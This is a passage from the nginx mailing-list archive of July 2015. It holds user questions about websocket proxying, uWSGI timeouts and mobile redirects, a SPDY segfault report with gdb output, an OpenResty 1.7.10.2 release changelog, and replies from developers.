From nginx-forum at nginx.us Wed Jul 1 03:08:36 2015
From: nginx-forum at nginx.us (snagytx)
Date: Tue, 30 Jun 2015 23:08:36 -0400
Subject: websocket causes "client sent invalid method ..."
Message-ID:

Hello,

I'm trying setup nginx for socket proxy. I was able to find that nginx can
be configured to proxy websockets and added an error log file in the server
configuration block to isolate the messages, and I get:

client sent invalid method while reading client request line, client:
XX.XX.XX.1, server: , request: ?b??"

in the access logs I see:

XX.XX.XX.1 - - [30/Jun/2015:17:39:15 -0400]
"\x00\x08\x1B\x19\x94\xD2\x81b\xBD\xF3" 400 172 "-" "-" "-"

The software that is I need to proxy is a remote assistant application with
a web servlet running inside tomcat and with two client applications, one
admin and one user, that connect to the server and communicate.

Is there anything that can be done to make it work?

Thank you in advance.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260007,260007#msg-260007

From nginx-forum at nginx.us Wed Jul 1 11:28:59 2015
From: nginx-forum at nginx.us (kirimedia)
Date: Wed, 01 Jul 2015 07:28:59 -0400
Subject: nginx-1.9.2 + ssl + spdy segfault
Message-ID: <1ac0379611c5ea9e93fdbc3f8c20a634.NginxMailingListEnglish@forum.nginx.org>

Segfault in nginx-1.9.2 with ssl and spdy module

# nginx -V
nginx version: nginx/1.9.2
built by gcc 4.4.6 20110731 (Red Hat 4.4.6-3) (GCC)
built with OpenSSL 1.0.1e-fips 11 Feb 2013
TLS SNI support enabled
configure arguments: --user=nginx --group=nginx --prefix=/usr/local/nginx
--sbin-path=/usr/local/nginx/sbin/nginx
--conf-path=/usr/local/nginx/conf/nginx.conf --with-http_ssl_module
--with-http_gzip_static_module --with-http_stub_status_module
--with-http_realip_module --with-debug --with-ipv6 --with-http_spdy_module
--add-module=/home/buildbot/rpm//BUILD/lua-nginx-module-0.9.16
--add-module=/home/buildbot/rpm//BUILD/ngx_devel_kit-0.2.14

# gdb nginx nginx.core
GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /usr/local/nginx/sbin/nginx...done.
[New Thread 24331]
...
#0 ngx_http_spdy_close_stream_handler (ev=0x754eb58) at src/http/ngx_http_spdy.c:3353
3353 src/http/ngx_http_spdy.c: No such file or directory.
 in src/http/ngx_http_spdy.c
Missing separate debuginfos, use: debuginfo-install nginx-rb-1.9.52-1.x86_64
(gdb) directory nginx-1.9.2
Source directories searched: nginx-1.9.2:$cdir:$cwd
(gdb) bt
#0 ngx_http_spdy_close_stream_handler (ev=0x754eb58) at src/http/ngx_http_spdy.c:3353
#1 0x0000000000482562 in ngx_http_spdy_write_handler (wev=) at src/http/ngx_http_spdy.c:649
#2 0x0000000000435f26 in ngx_event_process_posted (cycle=0xcc6a20, posted=0x76fcd0) at src/event/ngx_event_posted.c:33
#3 0x000000000043ce85 in ngx_worker_process_cycle (cycle=0xcc6a20, data=) at src/os/unix/ngx_process_cycle.c:769
#4 0x000000000043b234 in ngx_spawn_process (cycle=0xcc6a20, proc=0x43cdb0 , data=0x10, name=0x4f98b3 "worker process", respawn=-4) at src/os/unix/ngx_process.c:198
#5 0x000000000043c1cc in ngx_start_worker_processes (cycle=0xcc6a20, n=23, type=-4) at src/os/unix/ngx_process_cycle.c:358
#6 0x000000000043dbd8 in ngx_master_process_cycle (cycle=0xcc6a20) at src/os/unix/ngx_process_cycle.c:243
#7 0x000000000041b856 in main (argc=, argv=) at src/core/nginx.c:415
(gdb) list
3348     ngx_http_request_t *r;
3349
3350     fc = ev->data;
3351     r = fc->data;
3352
3353     ngx_log_debug0(NGX_LOG_DEBUG_HTTP, r->connection->log, 0,
3354                    "spdy close stream handler");
3355
3356     ngx_http_spdy_close_stream(r->spdy_stream, 0);
3357 }
(gdb) p r
$1 = (ngx_http_request_t *) 0x0
(gdb) p fc
$2 = (ngx_connection_t *) 0x754ea20
(gdb) p *fc
$3 = {data = 0x0, read = 0x754eaf8, write = 0x754eb58, fd = 1041, recv = 0x4424e0 , send = 0x441e90 , recv_chain = 0x442990 , send_chain = 0x484830 , listening = 0xcc6f00, sent = 16770, log = 0x754ebb8, pool = 0x1edb9a0, sockaddr = 0x1edb9f0, socklen = 16, addr_text = {len = 11, data = 0x1edba50 "83.149.9.264"}, proxy_protocol_addr = {len = 0, data = 0x0}, ssl = 0x53307b8, local_sockaddr = 0xe773e0, local_socklen = 16, buffer = 0x0, queue = { prev = 0x0, next = 0x0}, number = 68976568, requests = 7, buffered = 2, log_error = 2, unexpected_eof = 0, timedout = 0, error = 1, destroyed = 1, idle = 0, reusable = 0, close = 0, sendfile = 1, sndlowat = 1, tcp_nodelay = 2, tcp_nopush = 0, need_last_buf = 1}
(gdb) p ev
$4 = (ngx_event_t *) 0x754eb58
(gdb) p *ev
$5 = {data = 0x754ea20, write = 1, accept = 0, instance = 0, active = 0, disabled = 0, ready = 1, oneshot = 0, complete = 0, eof = 0, error = 0, timedout = 0, timer_set = 0, delayed = 0, deferred_accept = 0, pending_eof = 0, posted = 0, closed = 0, channel = 0, resolver = 0, cancelable = 0, available = 0, handler = 0x47ed90 , index = 0, log = 0x754ebb8, timer = {key = 0, left = 0x0, right = 0x0, parent = 0x0, color = 0 '\000', data = 0 '\000'}, queue = {prev = 0x0, next = 0x0}}
(gdb) f 1
#1 0x0000000000482562 in ngx_http_spdy_write_handler (wev=) at src/http/ngx_http_spdy.c:649
649 wev->handler(wev);
(gdb) list
644
645         ngx_log_debug1(NGX_LOG_DEBUG_HTTP, c->log, 0,
646                        "run spdy stream %ui", stream->id);
647
648         wev = stream->request->connection->write;
649         wev->handler(wev);
650     }
651
652     sc->blocked = 0;
653
(gdb) p wev
$6 =
(gdb) p stream
$7 = (ngx_http_spdy_stream_t *) 0x66a7150
(gdb) p *stream
$8 = {id = 13, request = 0x66a64c0, connection = 0x39861e0, index = 0x0, header_buffers = 0, queued = 0, send_window = 40500, recv_window = 2147483647, free_frames = 0x10ec518, free_data_headers = 0x10ec558, free_bufs = 0x10ec4b8, queue = {prev = 0x0, next = 0x0}, priority = 4,
handled = 0, blocked = 0, exhausted = 0, in_closed = 1, out_closed = 1, skip_data = 1}
(gdb) p stream->request
$9 = (ngx_http_request_t *) 0x66a64c0
(gdb) p *stream->request
$10 = {signature = 1347703880, connection = 0x754ea20, ctx = 0x66a6df8, main_conf = 0xcc76e0, srv_conf = 0xd2a178, loc_conf = 0xd3a0c0, read_event_handler = 0x454ee0 , write_event_handler = 0x4521f0 , cache = 0x0, upstream = 0x0, upstream_states = 0x0, pool = 0x0, header_in = 0x66a7100, headers_in = {headers = {last = 0x66a6530, part = {elts = 0x10ebb50, nelts = 5, next = 0x0}, size = 48, nalloc = 20, pool = 0x66a6470}, host = 0x10ebb50, connection = 0x0, if_modified_since = 0x0, if_unmodified_since = 0x0, if_match = 0x0, if_none_match = 0x0, user_agent = 0x10ebc10, referer = 0x0, content_length = 0x0, content_type = 0x0, range = 0x0, if_range = 0x0, transfer_encoding = 0x0, expect = 0x0, upgrade = 0x0, accept_encoding = 0x10ebbb0, via = 0x0, authorization = 0x0, keep_alive = 0x0, x_forwarded_for = {elts = 0x0, nelts = 0, size = 0, nalloc = 0, pool = 0x0}, x_real_ip = 0x0, user = {len = 0, data = 0x0}, passwd = {len = 0, data = 0x0}, cookies = {elts = 0x66a71c0, nelts = 0, size = 8, nalloc = 2, pool = 0x66a6470}, server = {len = 11, data = 0x10eb761 "r.mradx.net"}, content_length_n = -1, keep_alive_n = -1, connection_type = 1, chunked = 0, msie = 0, msie6 = 0, opera = 0, gecko = 0, chrome = 0, safari = 0, konqueror = 0}, headers_out = {headers = {last = 0x66a66a0, part = {elts = 0x66a6a38, nelts = 4, next = 0x0}, size = 48, nalloc = 20, pool = 0x66a6470}, status = 200, status_line = {len = 0, data = 0x0}, server = 0x0, date = 0x0, content_length = 0x0, content_encoding = 0x0, location = 0x0, refresh = 0x0, last_modified = 0x0, content_range = 0x0, accept_ranges = 0x66a6ac8, www_authenticate = 0x0, expires = 0x66a6a68, etag = 0x66a6a38, override_charset = 0x0, content_type_len = 10, content_type = {len = 10, data = 0xd84f60 "image/jpeg"}, charset = {len = 0, data = 0x0}, content_type_lowcase =
0x0, content_type_hash = 0, cache_control = {elts = 0x66a7468, nelts = 1, size = 8, nalloc = 1, pool = 0x66a6470}, content_length_n = 25036, date_time = 0, last_modified_time = 1434536173}, request_body = 0x0, lingering_time = 0, start_sec = 1435303301, start_msec = 143, method = 2, http_version = 1001, request_line = {len = 0, data = 0x66a71d0 "GET /img/BA/1F3F84.jpg HTTP/1.1"}, uri = {len = 18, data = 0x10eb78b "/img/BA/1F3F84.jpg"}, args = {len = 0, data = 0x0}, exten = {len = 3, data = 0x10eb79a "jpg"}, unparsed_uri = {len = 18, data = 0x10eb78b "/img/BA/1F3F84.jpg"}, method_name = {len = 3, data = 0x66a71d0 "GET /img/BA/1F3F84.jpg HTTP/1.1"}, http_protocol = {len = 8, data = 0x10eb7c1 "HTTP/1.1"}, out = 0x0, main = 0x66a64c0, parent = 0x0, postponed = 0x0, post_subrequest = 0x0, posted_requests = 0x0, phase_handler = 18, content_handler = 0, access_code = 0, variables = 0x66a6fa0, ncaptures = 0, captures = 0x66a71f0, captures_data = 0x0, limit_rate = 0, limit_rate_after = 0, header_size = 386, request_length = 301, err_status = 0, http_connection = 0x5330770, spdy_stream = 0x66a7150, log_handler = 0x452510 , cleanup = 0x0, subrequests = 201, count = 0, blocked = 0, aio = 0, http_state = 6, complex_uri = 0, quoted_uri = 0, plus_in_uri = 0, space_in_uri = 0, invalid_header = 0, add_uri_to_alias = 0, valid_location = 1, valid_unparsed_uri = 1, uri_changed = 0, uri_changes = 11, request_body_in_single_buf = 0, request_body_in_file_only = 0, request_body_in_persistent_file = 0, request_body_in_clean_file = 0, request_body_file_group_access = 0, request_body_file_log_level = 5, request_body_no_buffering = 0, subrequest_in_memory = 0, waited = 0, cached = 0, gzip_tested = 0, gzip_ok = 0, gzip_vary = 0, proxy = 0, bypass_cache = 0, no_cache = 0, limit_conn_set = 0, limit_req_set = 0, pipeline = 0, chunked = 0, header_only = 0, keepalive = 0, lingering_close = 0, discard_body = 0, reading_body = 0, internal = 0, error_page = 0, filter_finalize = 0, post_action = 0, 
request_complete = 0, request_output = 1, header_sent = 1, expect_tested = 0, root_tested = 1, done = 0, logged = 0, buffered = 0, main_filter_need_in_memory = 1, filter_need_in_memory = 0, filter_need_temporary = 0, allow_ranges = 1, single_range = 0, disable_not_modified = 0, stat_reading = 0, stat_writing = 1, state = 0, header_hash = 3194399592611459, lowcase_index = 18446744073709551615, lowcase_header = '\000' , header_name_start = 0x10eb81b "user-agent", header_name_end = 0x10eb825 "", header_start = 0x10eb829 "CFNetwork/711.3.18 Darwin/14.0.0", header_end = 0x10eb861 "", uri_start = 0x66a64c0 "HTTP", uri_end = 0x0, uri_ext = 0x10eb79a "jpg", args_start = 0x0, request_start = 0x0, request_end = 0x0, method_end = 0x0, schema_start = 0x10eb7ac "https", schema_end = 0x10eb7b1 "", host_start = 0x0, host_end = 0x0, port_start = 0x0, port_end = 0x0, http_minor = 1, http_major = 1, content_start_sec = 0, content_start_msec = 0, content_end_sec = 0, content_end_msec = 0, gzip_process = 0, gzip_start_sec = 0, gzip_start_msec = 0, gzip_end_sec = 0, gzip_end_msec = 0}
(gdb) p stream->request->connection
$11 = (ngx_connection_t *) 0x754ea20
(gdb) p *stream->request->connection
$12 = {data = 0x0, read = 0x754eaf8, write = 0x754eb58, fd = 1041, recv = 0x4424e0 , send = 0x441e90 , recv_chain = 0x442990 , send_chain = 0x484830 , listening = 0xcc6f00, sent = 16770, log = 0x754ebb8, pool = 0x1edb9a0, sockaddr = 0x1edb9f0, socklen = 16, addr_text = {len = 11, data = 0x1edba50 "83.149.9.264"}, proxy_protocol_addr = {len = 0, data = 0x0}, ssl = 0x53307b8, local_sockaddr = 0xe773e0, local_socklen = 16, buffer = 0x0, queue = { prev = 0x0, next = 0x0}, number = 68976568, requests = 7, buffered = 2, log_error = 2, unexpected_eof = 0, timedout = 0, error = 1, destroyed = 1, idle = 0, reusable = 0, close = 0, sendfile = 1, sndlowat = 1, tcp_nodelay = 2, tcp_nopush = 0, need_last_buf = 1}
(gdb) p stream->request->connection->write
$13 = (ngx_event_t *) 0x754eb58
(gdb) p *stream->request->connection->write
$14 = {data = 0x754ea20, write = 1, accept = 0, instance = 0, active = 0, disabled = 0, ready = 1, oneshot = 0, complete = 0, eof = 0, error = 0, timedout = 0, timer_set = 0, delayed = 0, deferred_accept = 0, pending_eof = 0, posted = 0, closed = 0, channel = 0, resolver = 0, cancelable = 0, available = 0, handler = 0x47ed90 , index = 0, log = 0x754ebb8, timer = {key = 0, left = 0x0, right = 0x0, parent = 0x0, color = 0 '\000', data = 0 '\000'}, queue = {prev = 0x0, next = 0x0}}
(gdb)

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260010,260010#msg-260010

From arut at nginx.com Thu Jul 2 07:52:51 2015
From: arut at nginx.com (Roman Arutyunyan)
Date: Thu, 2 Jul 2015 10:52:51 +0300
Subject: Small bug in src/stream/ngx_stream_proxy_module.c
In-Reply-To: <4afa7aa7beae7fd58fec794f011b7c93.NginxMailingListEnglish@forum.nginx.org>
References: <4afa7aa7beae7fd58fec794f011b7c93.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

Thanks, we're planning to commit the fix.

Could you say your name so we could add it to the commit message?

> On 30 Jun 2015, at 15:38, itpp2012 wrote:
>
> Roman Arutyunyan Wrote:
> -------------------------------------------------------
>>> On 30 Jun 2015, at 15:01, itpp2012 wrote:
>>>
>>> Roman Arutyunyan Wrote:
>>> -------------------------------------------------------
>>>> What compiler do you have?
>>>
>>> A proper one :) vc++
>>
>> version?
>
> 2010, 2013, 2015, all the same.
>
> Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259969,259993#msg-259993
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>

-- 
Roman Arutyunyan

From nginx-forum at nginx.us Thu Jul 2 08:36:37 2015
From: nginx-forum at nginx.us (itpp2012)
Date: Thu, 02 Jul 2015 04:36:37 -0400
Subject: Small bug in src/stream/ngx_stream_proxy_module.c
In-Reply-To:
References:
Message-ID:

Roman Arutyunyan Wrote:
-------------------------------------------------------
> Thanks, we're planning to commit the fix.
>
> Could you say your name so we could add it to the commit message?

Just stick to itpp2012, everyone knows by now we produce nginx for Windows
based on the Linux version, the code base is not too different.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259969,260015#msg-260015

From nginx-forum at nginx.us Thu Jul 2 08:48:35 2015
From: nginx-forum at nginx.us (yangcl)
Date: Thu, 02 Jul 2015 04:48:35 -0400
Subject: resolver for upstream
In-Reply-To: <00e47f88559985c574d367a526fef7c4.NginxMailingListEnglish@forum.nginx.org>
References: <00e47f88559985c574d367a526fef7c4.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <2f4f60f41141f91552d7a9f7c750405b.NginxMailingListEnglish@forum.nginx.org>

I have encountered such a problem

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,251138,260017#msg-260017

From shahzaib.cb at gmail.com Thu Jul 2 15:11:48 2015
From: shahzaib.cb at gmail.com (shahzaib shahzaib)
Date: Thu, 2 Jul 2015 20:11:48 +0500
Subject: Nginx support fot Weedfs !!
In-Reply-To:
References:
Message-ID:

Guys any advice ?

On Thu, Jun 25, 2015 at 4:17 AM, shahzaib shahzaib wrote:

> Hi,
>
> We're deploying WeedFS distributed filesystem for thumbs storage and
> scalability. Weedfs is composed of two layers (Master, Volume). Master
> server does all metadata mapping to track the corresponding volume server
> against user requested file whereas volume server is the actual storage to
> serve those requested files back to user via HTTP. Currently, weedfs
> default webserver is being used as HTTP but it would be better to have
> nginx webserver on volume servers for its low foot prints, stability and
> robust response time for static .jpg files.
>
> So we need to know if we can use nginx with weedFS ? Following is the
> github we found, but need to confirm if it will fulfill our needs ?
>
> https://github.com/medcl/lua-resty-weedfs
>
> Thanks in advance.
>
> Regards.
> Shahzaib
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From nginx-forum at nginx.us Fri Jul 3 04:45:05 2015
From: nginx-forum at nginx.us (ajjH6)
Date: Fri, 03 Jul 2015 00:45:05 -0400
Subject: uWSGI - upstream prematurely closed connection while reading response header from upstream
In-Reply-To: <452c44c7dcdac9c27c0d31af3688fdb9.NginxMailingListEnglish@forum.nginx.org>
References: <452c44c7dcdac9c27c0d31af3688fdb9.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <83636fb27e998bba4096b035adf1a3f1.NginxMailingListEnglish@forum.nginx.org>

Any ideas? I just want to run a uWSGI app for more than 60 seconds?

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259882,260022#msg-260022

From agentzh at gmail.com Fri Jul 3 09:49:41 2015
From: agentzh at gmail.com (Yichun Zhang (agentzh))
Date: Fri, 3 Jul 2015 17:49:41 +0800
Subject: [ANN] OpenResty 1.7.10.2 released
Message-ID:

Hi folks!

I am pleased to announce the new formal release, 1.7.10.2, of the OpenResty
bundle:

https://openresty.org/#Download

We include a lot of fixes and new features accumulated in the last few
months. Special thanks go to all our contributors and users for making this
happen!
Below is the complete change log for this release, as compared to the last
formal release (1.7.10.1):

* bugfix: ./configure: fixed the "--without-http_rewrite_module" option by
  disabling the ngx_devel_kit (NDK) module automatically; also
  automatically disable the ngx_encrypted_session module when the
  ngx_devel_kit (NDK) module is disabled.
* bugfix: ./configure: removed hacks to work around an old bug in the
  ngx_lua module's build system (just recently fixed in the ngx_lua
  module).
* bugfix: LuaJIT compilation might fail when old gcc 4 compilers are used
  (like gcc 4.1.0). this regression had appeared in OpenResty 1.7.7.2.
  thanks aseiot for the report.
* upgraded resty-cli to 0.03.
    * bugfix: resty: command-line options did not pass to the user Lua
      script unless "--" was intentionally specified. now standalone Lua
      scripts with a shebang line work out of the box (if LuaJIT is used,
      which is the default). thanks neomantra for the report.
    * bugfix: resty: now sends "error_log" to "stderr" instead of the
      system-specific path "/dev/stderr". thanks Evan Wies for the patch.
    * doc: added the new section "Test Suite" as per Enrique Garcia's
      request.
    * tests: fixed test failures on Mac OS X. thanks Enrique García for
      the report.
* upgraded the ngx_lua module to 0.9.16.
    * feature: ngx.encode_base64(): added support for the "no_padding"
      boolean argument to disable padding when a true value is specified.
      thanks Shuxin Yang for the patch.
    * feature: fixed compilation failures with nginx 1.9.0. thanks Charles
      R. Portwood II for the original patch.
    * feature: removed the dead code for the old "NGX_THREADS" mode which
      breaks the new nginx (1.7.11+) with thread pool support. thanks
      Tatsuhiko Kubo for the patch.
    * bugfix: use of "ngx_http_image_filter_module" might lead to request
      hang due to duplicate header filter invocations. thanks Antony
      Dovgal for the report.
    * bugfix: we should never automatically set "Content-Type" on 304
      responses. thanks Simon Eskildsen for the patch.
    * bugfix: raw downstream cosockets did not support full-duplexing.
      thanks aviramc for the bug report and the original patch.
    * bugfix: we did not always discard the request body if the user Lua
      handlers didn't, which might cause 400 error pages for keep-alive or
      pipelined requests. thanks Shuxin Yang for the original patch.
    * bugfix: ngx.resp.get_headers(): some built-in headers were not
      accessible via lowercase. thanks Nick Muerdter for the patch.
    * bugfix: we might still pick up Lua/LuaJIT headers/libraries in the
      paths specified by nginx ./configure's "--with-cc-opt=OPTS" and
      "--with-ld-opt=OPTS" options even when the LUAJIT_INC LUAJIT_LIB or
      LUA_INC LUA_LIB environments are explicitly specified.
    * bugfix: config: we might miss the linker option "-ldl" when we
      shouldn't. this might lead to build failures.
    * bugfix: access nonexistent fields in the "ngx" table in init_by_lua*
      could lead to the exception "no request object found" because of the
      overreacting "__index" metamethod of the "ngx" table.
    * bugfix: fixed compilation failures with very old versions of PCRE,
      like 4.5.
    * doc: fixed a bug in an example where both rewrite_by_lua and
      content_by_lua produce response outputs. thanks fengidri for the
      report.
    * doc: fixed the context for the lua_need_request_body directive.
      thanks Tatsuhiko Kubo for the patch.
    * doc: fixed the code sample for ngx.redirect() to reflect recent
      changes there. thanks Zi Lin for the report.
    * doc: added a note on possible uninitialized variables for
      short-circuited requests. thanks Simon Eskildsen for the patch.
    * tests: fixed nondeterminism due to unordered Lua table iterations.
      thanks Markus Linnala for the patch.
* upgraded the ngx_headers_more module to 0.26.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * optimize: removed the unused C function
      "ngx_http_headers_more_rm_header". thanks Markus Linnala for the
      catch.
    * doc: made it clear that more_set_headers always override existing
      headers with the same name.
* upgraded the ngx_set_misc module to 0.29.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * tests: add openssl hmac defensive test. thanks Markus Linnala for
      the patch.
* upgraded the ngx_lua_upstream module to 0.03.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * doc: README.md: fixed the get_backup_peers example. thanks Jakub
      Kramarz for the patch.
* upgraded the ngx_srcache module to 0.30.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
* upgraded the ngx_drizzle module to 0.1.9.
    * feature: fixed compilation errors with nginx 1.9.1+.
    * feature: automatic libdrizzle path discovery for Ubuntu 12.04.
      thanks Mathew Heard for the patch.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
* upgraded the ngx_postgres module to 1.0rc6.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * bugfix: use "ngx_abs()" instead of "abs()" to fix one clang warning
      ("-Wabsolute-value").
* upgraded the ngx_rds_csv module to 0.06.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * bugfix: fixed two clang "-Wconditional-uninitialized" warnings.
    * doc: improved the documentation a lot.
* upgraded the ngx_rds_json module to 0.14.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * doc: improved the documentation a lot.
* upgraded the ngx_echo module to 0.58.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * bugfix: we no longer break on subrequests when the
      "ngx_http_ssi_module" is disabled. thanks Anthony Ryan for the
      patch.
    * bugfix: use of "ngx_http_image_filter_module" might lead to request
      hang due to duplicate header filter invocations.
* upgraded the ngx_memc module to 0.16.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * bugfix: fixed clang warnings on "unused variables" in the Ragel
      generated source.
* upgraded the ngx_redis2 module to 0.12.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * bugfix: fixed clang warnings on "unused variables" in the Ragel
      generated source.
    * bugfix: always set the response status code in case of bad statuses
      like 504. thanks Kaito Sys for the report.
    * doc: typo fixes from Karan Chaudhary.
* upgraded the ngx_encrypted_session module to 0.04.
    * feature: added debugging logs for expiration times during encryption
      and decryption. also adjusted other debug logging messages a bit.
      thanks Kalpesh Patel for requesting this.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * bugfix: fixed warnings from the Microsoft C/C++ compiler. thanks
      Edwin Cleton for the report.
    * doc: improved the documentation a lot.
* upgraded the ngx_iconv module to 0.11.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
* upgraded the ngx_array_var module to 0.04.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * doc: improved the documentation a lot.
* upgraded the ngx_xss module to 0.05.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
    * bugfix: fixed clang warnings on "unused variables" in the Ragel
      generated source.
    * doc: improved the documentation a lot.
* upgraded the ngx_form_input module to 0.11.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
* upgraded the ngx_coolkit module to 0.2rc3.
    * feature: fixed compilation failures with nginx 1.7.11+ configured
      with "--with-threads".
* upgraded LuaJIT to v2.1-20150622:
  https://github.com/openresty/luajit2/tags
    * imported Mike Pall's latest changes:
        * Add Xbox One port.
        * Fix narrowing of TOBIT.
        * x64: Allow building without external unwinder.
        * x86/x64: Fix argument check for bit shifts.
        * x64: Add LJ_GC64 mode interpreter. Enable this mode with:
          make "XCFLAGS=-DLUAJIT_ENABLE_GC64"
        * Disable trace stitching (for now) due to a design mistake.
        * Fix stack check in narrowing optimization.
        * ARM64: Fix math.floor/math.ceil for string args.
        * DynASM/PPC: Add sub/shift/rotate/clear instruction aliases.
        * DynASM/PPC: Add support for parameterized shifts/masks.
        * PPC: Fix cross-endian builds.
        * PPC: Fix write barrier in BC_TSETR.
        * Fix Lua/C API typecheck error for special indexes.
        * FFI: Fix FOLD rule for TOBIT + CONV num.u32.
        * ARM: Handle more arch defines.
        * Properly fail unsupported cross-compile to MIPS64.

The HTML version of the change log with lots of helpful hyper-links can be
browsed here:

http://openresty.org/#ChangeLog1007010

The next formal release of OpenResty will be based on the new Nginx 1.9.x
core.

OpenResty (aka. ngx_openresty) is a full-fledged web application server by
bundling the standard Nginx core, Lua/LuaJIT, lots of 3rd-party Nginx
modules and Lua libraries, as well as most of their external dependencies.
See OpenResty's homepage for details:

http://openresty.org/

We have run extensive testing on our Amazon EC2 test cluster and ensured
that all the components (including the Nginx core) play well together. The
latest test report can always be found here:

http://qa.openresty.org

Have fun!
Best regards,
-agentzh

From nginx-forum at nginx.us Fri Jul 3 11:04:20 2015
From: nginx-forum at nginx.us (ramsoft75)
Date: Fri, 03 Jul 2015 07:04:20 -0400
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
Message-ID: <676857aa61b897bbc97b69822bad4451.NginxMailingListEnglish@forum.nginx.org>

The problem is, the site is entered with www in url in a mobile device with
parameters in the url, it is redirected from www.domain.com to m.domain.com
but the parameters entered with www.domain.com/parameters when redirected
to m.domain.com doesn't receive the parameters from the url origin in www.

In conclusion www.domain.com/parameters should redirect to
m.domain.com/parameters but is redirected to m.domain.com, the parameters
are clean. Is there a way not to clean it ?

The www config is the following :

server {
    listen 80;
    server_name www.domain.com;
    ...
    #to detect if the device with www entered in domain is mobile
    if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') {
        rewrite ^ http://m.domain.com$uri;
    }
}

The mobile configuration is

server {
    listen 80;
    server_name m.domain.com;
    ...
}

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260033#msg-260033

From ryd994 at 163.com Fri Jul 3 17:06:47 2015
From: ryd994 at 163.com (ryd994)
Date: Fri, 03 Jul 2015 17:06:47 +0000
Subject: uWSGI - upstream prematurely closed connection while reading response header from upstream
In-Reply-To: <83636fb27e998bba4096b035adf1a3f1.NginxMailingListEnglish@forum.nginx.org>
References: <452c44c7dcdac9c27c0d31af3688fdb9.NginxMailingListEnglish@forum.nginx.org> <83636fb27e998bba4096b035adf1a3f1.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

It sounds like uwsgi setting problem. Prematurely closed connection means
Nginx is not expecting that.

On Fri, Jul 3, 2015, 00:45 ajjH6 wrote:

> Any ideas? I just want to run a uWSGI app for more than 60 seconds?
>
> Posted at Nginx Forum:
> http://forum.nginx.org/read.php?2,259882,260022#msg-260022
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From francis at daoine.org Fri Jul 3 17:47:30 2015
From: francis at daoine.org (Francis Daly)
Date: Fri, 3 Jul 2015 18:47:30 +0100
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To: <676857aa61b897bbc97b69822bad4451.NginxMailingListEnglish@forum.nginx.org>
References: <676857aa61b897bbc97b69822bad4451.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20150703174730.GP23844@daoine.org>

On Fri, Jul 03, 2015 at 07:04:20AM -0400, ramsoft75 wrote:

Hi there,

> In conclusion www.domain.com/parameters should redirect to
> m.domain.com/parameters but is redirected to m.domain.com, the parameters
> are clean. Is there a way not to clean it ?

It works for me as-is.

I add your "if" at server{} level, and I see:

curl -A iPad -i http://localhost/parameters?key=value

HTTP/1.1 302 Moved Temporarily
...
Location: http://m.domain.com/parameters?key=value

What response do you get for a similar curl command?

f
-- 
Francis Daly francis at daoine.org

From mdounin at mdounin.ru Sat Jul 4 05:12:12 2015
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Sat, 4 Jul 2015 08:12:12 +0300
Subject: nginx-1.9.2 + ssl + spdy segfault
In-Reply-To: <1ac0379611c5ea9e93fdbc3f8c20a634.NginxMailingListEnglish@forum.nginx.org>
References: <1ac0379611c5ea9e93fdbc3f8c20a634.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20150704051211.GC74913@mdounin.ru>

Hello!

On Wed, Jul 01, 2015 at 07:28:59AM -0400, kirimedia wrote:

> Segfault in nginx-1.9.2 with ssl and spdy module
>
> # nginx -V
> nginx version: nginx/1.9.2
> built by gcc 4.4.6 20110731 (Red Hat 4.4.6-3) (GCC)
> built with OpenSSL 1.0.1e-fips 11 Feb 2013
> TLS SNI support enabled
> configure arguments: --user=nginx --group=nginx --prefix=/usr/local/nginx
> --sbin-path=/usr/local/nginx/sbin/nginx
> --conf-path=/usr/local/nginx/conf/nginx.conf --with-http_ssl_module
> --with-http_gzip_static_module --with-http_stub_status_module
> --with-http_realip_module --with-debug --with-ipv6 --with-http_spdy_module
> --add-module=/home/buildbot/rpm//BUILD/lua-nginx-module-0.9.16
> --add-module=/home/buildbot/rpm//BUILD/ngx_devel_kit-0.2.14

